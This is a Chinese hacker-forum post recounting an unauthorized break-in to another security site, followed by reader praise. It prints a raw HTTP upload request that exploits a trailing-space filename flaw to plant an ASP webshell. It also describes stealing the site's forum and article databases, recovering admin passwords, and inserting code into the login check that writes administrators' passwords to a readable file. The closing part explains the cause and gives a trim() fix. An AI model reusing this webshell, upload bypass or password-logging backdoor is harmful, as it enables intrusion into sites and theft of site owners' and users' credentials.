我是这样进入一个黑客站点的
<TABLE cellSpacing=0 cellPadding=0 width="95%" align=center border=0><TR>
<TD vAlign=bottom align=middle height=40><FONT style="PADDING-RIGHT: 1px; PADDING-LEFT: 1px; FILTER: glow(color=#FF0000,strength=5); PADDING-BOTTOM: 1px; COLOR: #fed969; PADDING-TOP: 1px; HEIGHT: 10px" size=5>我是这样进入一个黑客站点的</FONT></TD></TR></TD></TR>
<TR>
<TD vAlign=top align=middle height=40>
<HR width="100%" color=#555555 SIZE=1>
</TD></TR>
<TR>
<TD class=line>
<P>_</A>content><FONT color=#e61a1a>来源:邪恶八进制 中国
作者:恶猫 (EvilCat)</FONT>
最近放假在家,没什么事,上网的时间多了,今天在平时喜欢去的几个安全站点转了转,站点上新的好的文章都给大家转到E.S.T的<a href="http://bbs.hackbase.com/" target="_blank" >论坛</A>上了(嘻嘻)。闲着也是闲着,干脆在这些站点的友情连接的站点看看,说不定又什么新的东西那。
好了,就进这个友情连接的站点看看吧。恩,网站的美工做的不错,看了看文章,没有什么太新的东西。刚要离开这个站点,发现这个站点的页面系统很熟悉,像是动力的文章系统,呵呵,看看页面的最底部写着“Powered by:FP3.6 Sp2”晕~~果真被我猜中,是自由动力文章系统。站点上还有一个dvbbs7.0sp2。出于职业毛病,我对这个站点产生了兴趣•••••••呵呵,在自由动力的文章系统里注册一个帐号看看。我进入用户控制面板中的文章管理看了看,我不说大家也应该知道我想干什么了••••••上传,呵呵。看看上传<a href="http://down.hackbase.com/" target="_blank" >软件</A>的位置写着“对不起,本站不允许上传”,也是作为一个黑客站点上传<a href="http://hackbase.com/News/World" target="_blank" >漏洞</A>怎么可能有呢。我记得我在黑客x档案增刊上发过一篇《突破封锁动力文章上传<a href="http://hackbase.com/News/World" target="_blank" >漏洞</A>再利用》的文章,文章说明了在禁止注册用户的情况下,我们还是可以用post<a href="http://hackbase.com/hacker" target="_blank" >攻击</A>的方式上传asp<a href="http://hackbase.com/hacker" target="_blank" >木马</A>的。在这种情况下也是这种<a href="http://hackbase.com/hacker" target="_blank" >攻击</A>方式是不是有效那?恩,试试就知道了。我先提交这个页面<a href="http://www.xxx.com/upload<a%20href=" target="_blank" >_</A>soft.asp" target=<a href="http://hackbase.com/hacker/tutorial/200502049847.htm#" target="_blank" >_</A>blank><FONT color=#0000ff>http://www.xxx.com/upload<a href="http://hackbase.com/hacker/tutorial/200502049847.htm#" target="_blank" >_</A>soft.asp</FONT></A>页面返回“对不起,本网站不允许上传文件!”我们再提交” <a href="http://www.xxx.com/upfile<a%20href=" target="_blank" >_</A>soft.asp" target=<a href="http://hackbase.com/hacker/tutorial/200502049847.htm#" target="_blank" >_</A>blank><FONT color=#0000ff>http://www.xxx.com/upfile<a href="http://hackbase.com/hacker/tutorial/200502049847.htm#" target="_blank" >_</A>soft.asp</FONT></A>
页面返回” 请先选择你要上传的文件!”哈哈,这说明可以用NC提交数据报进行post<a href="http://hackbase.com/hacker" target="_blank" >攻击</A>了,post的内容当然是asp<a href="http://hackbase.com/hacker" target="_blank" >木马</A>了,从现在看,成功的几率也只有50%因为对方要是修补了上传<a href="http://hackbase.com/News/World" target="_blank" >漏洞</A>,即使post过去肯定也是说,文件格式不对。我找了个以前自己利用自由动力上传<a href="http://hackbase.com/News/World" target="_blank" >漏洞</A>的数据包改了改,然后用nc提交过去,嘻嘻,上传成功了.关于数据报的修改和上传<a href="http://hackbase.com/News/World" target="_blank" >漏洞</A>的利用办法我想我就不必在和大家说一遍了,大家应该很熟练了。
下面给出post过去的数据报:
<FONT color=red>Code:</FONT>
<TEXTAREA>POST /Upfile<a href="#" target="_blank">_</a>Soft.asp HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, */*
Referer: http://www.xxx.com/upload<a href="#" target="_blank">_</a>soft.asp
Accept-Language: zh-cn
Content-Type: multipart/form-data; boundary=---------------------------7d531c25440a0c
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; Maxthon; .NET CLR 1.1.4322)
Host: www.xxx.com
Content-Length: 1497
Connection: Keep-Alive
Cache-Control: no-cache
Cookie:ASPSESSIONIDQSCQSADA=ICEEJPHALJLEBHKFIOJDPLOD; 831225=CookieDate=1&Password=635d6ca36de2ff6f&UserLevel=999&UserName=cat;
-----------------------------7d531c25440a0c
Content-Disposition: form-data; name="FileName"; filename="C:\Documents and Settings\e.cat\桌面\注入\mm.asp .rar"
Content-Type: text/plain
<%dim objFSO%>
<%dim fdata%>
<%dim objCountFile%>
<%on error resume next%>
<%Set objFSO = Server.CreateObject("Scripting.FileSystemObject")%>
<%if Trim(request("syfdpath"))<>"" then%>
<%fdata = request("cyfddata")%>
<%Set objCountFile=objFSO.CreateTextFile(request("syfdpath"),True)%>
<%objCountFile.Write fdata%>
<%if err =0 then%>
<%response.write "<font color=red>save Success!</font>"%>
<%else%>
<%response.write "<font color=red>Save UnSuccess!</font>"%>
<%end if%>
<%err.clear%>
<%end if%>
<%objCountFile.Close%>
<%Set objCountFile=Nothing%>
<%Set objFSO = Nothing%>
<%Response.write "<form action='''' method=post>"%>
<%Response.write "保存文件的<font color=red>绝对路径(包括文件名:如D:\web\x.asp):</font>"%>
<%Response.Write "<input type=text name=syfdpath width=32 size=50>"%>
<%Response.Write "<br>"%>
<%Response.write "本文件绝对路径"%>
<%=server.mappath(Request.ServerVariables("SCRIPT<a href="#" target="_blank">_</a>NAME"))%>
<%Response.write "<br>"%>
<%Response.write "输入马的内容:"%>
<%Response.write "<textarea name=cyfddata cols=80 rows=10 width=32></textarea>"%>
<%Response.write "<input type=submit value=保存>"%>
<%Response.write "</form>"%>
-----------------------------7d531c25440a0c
Content-Disposition: form-data; name="Submit"
上传
-----------------------------7d531c25440a0c—
</TEXTAREA>
<FONT color=red></FONT>
用提交过去的<a href="http://hackbase.com/hacker" target="_blank" >木马</A>再写入个海洋2005进去,看看网站的目录是什么样子的,权限锁得很死,
只能在网站目录浏览,cmd命令一个也执行不了,晕••••••不管那么多了,刚才不是还看到一个dvbbs7.0sp2吗,先把<a href="http://hackbase.com/hacker" target="_blank" >数据库</A>下载下来看看。下载下来后用<a href="http://hackbase.com/hacker" target="_blank" >数据库</A>辅助浏览器看看,在<a href="http://bbs.hackbase.com/" target="_blank" >论坛</A>的页面上可以看出XXXX是<a href="http://bbs.hackbase.com/" target="_blank" >论坛</A>的管理员,在<a href="http://hackbase.com/hacker" target="_blank" >数据库</A>的DV<a href="http://hackbase.com/hacker/tutorial/200502049847.htm#" target="_blank" >_</A>User,表和DV<a href="http://hackbase.com/hacker/tutorial/200502049847.htm#" target="_blank" >_</A>Admin表中可以看出<a href="http://bbs.hackbase.com/" target="_blank" >论坛</A>的前台和后台的用户名和<a href="http://hackbase.com/hacker" target="_blank" >密码</A>都是不一样的,然后再用<a href="http://hackbase.com/hacker" target="_blank" >数据库</A>浏览器看看DV<a href="http://hackbase.com/hacker/tutorial/200502049847.htm#" target="_blank" >_</A>Log表中content字段,关键字password,查看一下是否有明文的管理员<a href="http://hackbase.com/hacker" target="_blank" >密码</A>,呵呵,果真<a href="http://hackbase.com/hacker" target="_blank" >密码</A>出来了是xxxxxx008,从前台的DV<a href="http://hackbase.com/hacker/tutorial/200502049847.htm#" target="_blank" >_</A>User表中看出用名是前台管理员名字是xxxx和后台的管理员名字后面也差了一个008,估计前台的密吗是不是和后台就差那么一个008那,我用md5转换器验证了一下我的猜测,呵呵,又被我猜中了,看来黑客也是需要运气的哈哈。好了dvbbs的前台和后台的<a href="http://hackbase.com/hacker" target="_blank" >密码</A>都知道了,以后aspshell要是丢了用管理员的<a href="http://hackbase.com/hacker" target="_blank" >密码</A>进去一样可以backup a shell的。下面再把自由动力的<a href="http://hackbase.com/hacker" target="_blank" >数据库</A>下来看看,自由动力的<a href="http://hackbase.com/hacker" target="_blank" >数据库</A>的admin表中的管理员<a href="http://hackbase.com/hacker" target="_blank" >密码</A>的md5值和动网的不一样,看来管理员还是有一些安全意识的。我自己猜测了几个,这回没那么好运了,没又猜出来。不过没关系,我还有办法得到他的<a href="http://hackbase.com/hacker" target="_blank" >密码</A>的,分析一下自由动力的源码,可以看出,<a href="http://hackbase.com/hacker" target="_blank" >密码</A>的验证是靠Admin<a href="http://hackbase.com/hacker/tutorial/200502049847.htm#" target="_blank" >_</A>ChkLogin.asp这个文件,我们接着往下分析。文件的部分<a href="http://hackbase.com/hacker" target="_blank" >代码</A>如下:
<FONT color=red>Code:</FONT>
<TEXTAREA>username=replace(trim(request("username")),"'","")
password=replace(trim(Request("password")),"'","")
CheckCode=replace(trim(Request("CheckCode")),"'","")
if UserName="" then
FoundErr=True
ErrMsg=ErrMsg & "<br><li>用户名不能为空!</li>"
end if
if Password="" then
FoundErr=True
ErrMsg=ErrMsg & "<br><li><a href="http://hackbase.com/hacker" target="_blank">密码</a>不能为空!</li>"
end if
if CheckCode="" then
FoundErr=True
ErrMsg=ErrMsg & "<br><li>验证码不能为空!</li>"
end if
if session("CheckCode")="" then
FoundErr=True
ErrMsg=ErrMsg & "<br><li>你登录时间过长,请重新返回登录页面进行登录。</li>"
end if
if CheckCode<>CStr(session("CheckCode")) then
FoundErr=True
ErrMsg=ErrMsg & "<br><li>您输入的确认码和系统产生的不一致,请重新输入。</li>"
end if
if FoundErr<>True then
password=md5(password)
<a href="http://hackbase.com/hacker" target="_blank">sql</a>="select * from admin where password='"&password&"' and username='"&username&"'"
set rs=nt2003.execute(<a href="http://hackbase.com/hacker" target="_blank">sql</a>)
if rs.bof and rs.eof then
FoundErr=True
ErrMsg=ErrMsg & "<br><li>用户名或<a href="http://hackbase.com/hacker" target="_blank">密码</a>错误!!!</li>"
else
if password<>rs("password") then
FoundErr=True
ErrMsg=ErrMsg & "<br><li>用户名或<a href="http://hackbase.com/hacker" target="_blank">密码</a>错误!!!</li>"
else
nt2003.execute("update Admin set LastLoginIP='"&Request.ServerVariables("REMOTE<a href="#" target="_blank">_</a>ADDR")&"',LastLoginTime='"&now&"',LoginTimes=LoginTimes+1 Where username='"&username&"'")
session.Timeout=Clng(nt2003.site<a href="#" target="_blank">_</a>setting(15))
session("AdminName")=username
rs.close
set rs=nothing
Response.Redirect "Admin<a href="#" target="_blank">_</a>Index.asp"
end if
end if
rs.close
set rs=nothing
end if
if FoundErr=True then
call WriteErrMsg()
end if
</TEXTAREA>
<FONT color=red></FONT>
可以看出一些基本的错误要是没有找到既FoundErr<>True,程序就会将用户输入的<a href="http://hackbase.com/hacker" target="_blank" >密码</A>转换成md5然后交给<a href="http://hackbase.com/hacker" target="_blank" >数据库</A>去查询。好到此为止,我们将这段<a href="http://hackbase.com/hacker" target="_blank" >代码</A>
<FONT color=red>Code:</FONT>
<TEXTAREA>Dim fsoObject
Dim tsObject
Set fsoObject = Server.CreateObject("Scripting.FileSystemObject")
Set tsObject = fsoObject.CreateTextFile(Server.MapPath("cat.txt"))tsObject.Write CStr(request("password"))
Set fsoObject = Nothing
Set tsObject = Nothing
</TEXTAREA>
<FONT color=red></FONT>
插入到
<FONT color=red>Code:</FONT>
<TEXTAREA>if password<>rs("password") then
FoundErr=True
ErrMsg=ErrMsg & "<br><li>用户名或<a href="http://hackbase.com/hacker" target="_blank">密码</a>错误!!!</li>"
else
</TEXTAREA>
<FONT color=red></FONT>
的下面,作用管理员一旦登陆,就回将管理员的<a href="http://hackbase.com/hacker" target="_blank" >密码</A>写入到cat.txt。我们浏<a href="http://www.xxx.com/cat.txt" target="_blank" >_</A>blank><FONT color=#0000ff>http://www.xxx.com/cat.txt</FONT></A>管理员的<a href="http://hackbase.com/hacker" target="_blank" >密码</A>就一栏无余了,呵呵。这个思路虽不是我的<a href="http://hackbase.com/News/hk" target="_blank" >原创</A>但是把这个方法用在自由动力上还是第一呀。其实,有朋友回说webshell都有了为什么我对用户的<a href="http://hackbase.com/hacker" target="_blank" >密码</A>还是这么感兴趣,嘿嘿,管理员的qq和e-mail乃至他的ftp等等个人隐私的东西要是和其中的一个<a href="http://hackbase.com/hacker" target="_blank" >密码</A>一样••••••••不过大家可不要这么干呀,我只是做个试验••••••所以大家的<a href="http://hackbase.com/hacker" target="_blank" >密码</A>最好不要用一样的。好了<a href="http://hackbase.com/hacker" target="_blank" >入侵</A>暂且告一段落,提升权限是以后的事,我想给大家分析一下为什么自由动力的文章系统我们可以进行post<a href="http://hackbase.com/hacker" target="_blank" >攻击</A>。
这次成功的原因是两方面造成,一是自由动力程序存才post<a href="http://hackbase.com/hacker" target="_blank" >攻击</A>的可能,二是程序存在上传<a href="http://hackbase.com/News/World" target="_blank" >漏洞</A>。从根本上说还是上传<a href="http://hackbase.com/News/World" target="_blank" >漏洞</A>。</P>_</A>content> </TD></TR></TABLE> 下面是对与第一个问题的分析:
我们开始提交这个页面<a href="http://www.xxx.com/upload<a%20href=" target="_blank" >_</A>soft.asp" target=<a href="http://hackbase.com/hacker/tutorial/200502049847_1.htm#" target="_blank" >_</A>blank><FONT color=#0000ff>http://www.xxx.com/upload<a href="http://hackbase.com/hacker/tutorial/200502049847_1.htm#" target="_blank" >_</A>soft.asp</FONT></A>时,返回
“对不起,本网站不允许上传文件!”
我们来看upload<a href="http://hackbase.com/hacker/tutorial/200502049847_1.htm#" target="_blank" >_</A>soft.asp的部分源码:
<FONT color=red>Code:</FONT>
<TEXTAREA><%if nt2003.site<a href="#" target="_blank">_</a>setting(7)=1 then%><form action="Upfile<a href="#" target="_blank">_</a>Soft.asp" method="post" name="form1" onSubmit="return check()" enctype="multipart/form-data"> <input name="FileName" type="FILE" class="tx1" size="40"> <input type="submit" name="Submit" value="上传" style="border:1px double rgb(88,88,88);font:9pt"></form><%else response.write "对不起,本网站不允许上传文件!"end if%></TEXTAREA>
<FONT color=red></FONT>
我们注意到if nt2003.site<a href="http://hackbase.com/hacker/tutorial/200502049847_1.htm#" target="_blank" >_</A>setting(7)=1那么就会出现上传的表单。
我们提交<a href="http://www.xxx.com/upfile<a%20href=" target="_blank" >_</A>soft.asp" target=<a href="http://hackbase.com/hacker/tutorial/200502049847_1.htm#" target="_blank" >_</A>blank><FONT color=#0000ff>http://www.xxx.com/upfile<a href="http://hackbase.com/hacker/tutorial/200502049847_1.htm#" target="_blank" >_</A>soft.asp</FONT></A>
页面返回” 请先选择你要上传的文件!”
我们看看upfile<a href="http://hackbase.com/hacker/tutorial/200502049847_1.htm#" target="_blank" >_</A>soft.asp的部分源码:
<FONT color=red>Code:</FONT>
<TEXTAREA><%nt2003.GetSite<a href="#" target="_blank">_</a>Setting() const upload<a href="#" target="_blank">_</a>type=0 '上传方法:0=无惧无组件上传类,1=FSO上传 2=lyfupload,3=aspupload,4=chinaaspuploadconst SaveUpFilesPath="UploadSoft"const UpFileType="rar|zip|exe|mpg|rm|wav|mid"nt2003.site<a href="#" target="_blank">_</a>setting(7)=1 ‘注意这里!!!!const MaxFileSize=102400•••••••••••••sub upload<a href="#" target="_blank">_</a>0() '使用化境无组件上传类 set upload=new upfile<a href="#" target="_blank">_</a>class ''建立上传对象 upload.GetData(104857600) '取得上传数据,限制最大上传100M if upload.err > 0 then '如果出错 select case upload.err case 1 response.write "请先选择你要上传的文件!" case 2 response.write "你上传的文件总大小超出了最大限制(100M)" end select response.end end if</TEXTAREA>
<FONT color=red></FONT>
直接访问upfile<a href="http://hackbase.com/hacker/tutorial/200502049847_1.htm#" target="_blank" >_</A>soft.asp就会提示我们选择上传文件,这样我们post过去文件不就ok了。
而且自由动力在用户上传的时候并不检查用户的cookie,这点很危险。这个方面bbsgood就做的很好,虽然bbsgood存在上传<a href="http://hackbase.com/News/World" target="_blank" >漏洞</A>但是,但是官方网站没有开放上传功能并且没有被黑,就是因为bbsgood在用户上传时是检查用户的cookie中的内容的,比如bbsgood在UpLoad<a href="http://hackbase.com/hacker/tutorial/200502049847_1.htm#" target="_blank" >_</A>ID.ASP中有一段是这么写的:
<FONT color=red>Code:</FONT>
<TEXTAREA>username=Request.Cookies("username")password=Request.Cookies("password")if Request.Cookies("login")="Y" and ImageID>0 then Set rs=conn.execute("select top 1 id,用户名,<a href="http://hackbase.com/hacker" target="_blank">密码</a>,权限,帐号状态 from BBSGood<a href="#" target="_blank">_</a>User where 用户名='"&username&"' ") if (rs.bof and rs.eof) or rs("<a href="http://hackbase.com/hacker" target="_blank">密码</a>")<>password then Response.Write i+1 &"、你没有上传权限<br>" else if (ImageID=1 and (rs("权限")="admin" or rs("权限")="bbsadmin")) or (ImageID=2 and rs("权限")="admin") or (ImageID=3 and rs("权限")="bbsadmin") or ImageID=4 then filename = SaveFile(FormFieldName, filePath, maxfilesize, SavType, FsoType, ForbidType) '保存并取得文件名 else Response.Write i+1 &"、你没有上传权限<br>" end if end ifend if</TEXTAREA>
<FONT color=red></FONT>
呵呵,要不是这段<a href="http://hackbase.com/hacker" target="_blank" >代码</A>我想发现上传<a href="http://hackbase.com/News/World" target="_blank" >漏洞</A>时官方网站就已经被黑了••••••
下面是第二个问题的分析:
我想上传<a href="http://hackbase.com/News/World" target="_blank" >漏洞</A>大家都不陌生,分析<a href="http://hackbase.com/News/World" target="_blank" >漏洞</A>原因的文章很多的,我这里还是再说一下原因,asp (后面有空格)是不等于asp的,而对于windows对于碰到有空格的他会自动去掉空格,所以当我们上传一个asp 文件就会变成一个asp文件。可是我发现网上关于上传<a href="http://hackbase.com/News/World" target="_blank" >漏洞</A>的修补的文章真是少之又少,我在google中搜了半天竟然没有找到,晕。利用上传<a href="http://hackbase.com/News/World" target="_blank" >漏洞</A>进去的肉鸡不把<a href="http://hackbase.com/News/World" target="_blank" >漏洞</A>补上怎么成那,一般的做法都是删除文件什么的,这么做实在是不好。其实关于<a href="http://hackbase.com/News/World" target="_blank" >漏洞</A>的修补我们可以用trim这个函数,下面是trim函数在MSDN中的说明:
Trim function
Returns a copy of a string without leading spaces (LTrim), trailing spaces (RTrim), or both leading and trailing spaces (Trim).
LTrim(string)
RTrim(string)
Trim(string)
The string argument is any valid string expression. If string contains Null, Null is returned.
Remarks
The following example uses the LTrim, RTrim, and Trim functions to trim leading spaces, trailing spaces, and both leading and trailing spaces, respectively:
Dim MyVar
MyVar = LTrim(" vbscript ") ' MyVar contains "vbscript ".
MyVar = RTrim(" vbscript ") ' MyVar contains " vbscript".
MyVar = Trim(" vbscript ") ' MyVar contains "vbscript".
我们知道自由动力使用的是无惧上传类,引用具有上传<a href="http://hackbase.com/News/World" target="_blank" >漏洞</A>的upfile<a href="http://hackbase.com/hacker/tutorial/200502049847_1.htm#" target="_blank" >_</A>class.asp中的部分<a href="http://hackbase.com/hacker" target="_blank" >代码</A>:
<FONT color=red>Code:</FONT>
<TEXTAREA>oFileInfo.FileName = Mid (sFileName,InStrRev (sFileName, "\")+1)oFileInfo.FilePath = Left (sFileName,InStrRev (sFileName, "\"))oFileInfo.FileExt = Mid (sFileName,InStrRev (sFileName, ".")+1)</TEXTAREA>
<FONT color=red></FONT>
看到了吧,并没有过滤空格,我们可以用trim函数这样修补:
<FONT color=red>Code:</FONT>
<TEXTAREA>oFileInfo.FileName = trim(Mid (sFileName,InStrRev (sFileName, "\")+1))oFileInfo.FilePath = trim(Left (sFileName,InStrRev (sFileName, "\")))oFileInfo.FileExt = trim(Mid (sFileName,InStrRev (sFileName, ".")+1))</TEXTAREA>
<FONT color=red></FONT>
恩这就好多了,关于动网的上传<a href="http://hackbase.com/News/World" target="_blank" >漏洞</A>大家可以对比一下,以前的动网坛的upfile.asp和现在的upfile.asp就明白应该怎样修补了。
好的问题也分析完了,看看这个站长的e-mail给他发个邮件告诉他,他的网站存在上传<a href="http://hackbase.com/News/World" target="_blank" >漏洞</A>,并且已经给他修补了,网站的后门已经全部清楚,文章管理员的<a href="http://hackbase.com/hacker" target="_blank" >密码</A>和bbs的<a href="http://hackbase.com/hacker" target="_blank" >密码</A>记得改。呵呵,这次<a href="http://hackbase.com/hacker" target="_blank" >入侵</A>从中学到一些东西就够了,何必要改人家的主页来炫耀自己呢,这种提升国内网络安全的方法不是很好吗?做个好孩子•••••••••• 强! 真的是你自己入侵的? 厉害~~~ <P>佩服,什么时候我能修炼到你的程度!!!!!!!!</P> 头衔真的是前途无量啊, 以后我就跟着你混了哈 晕!我这儿看不到呀 顶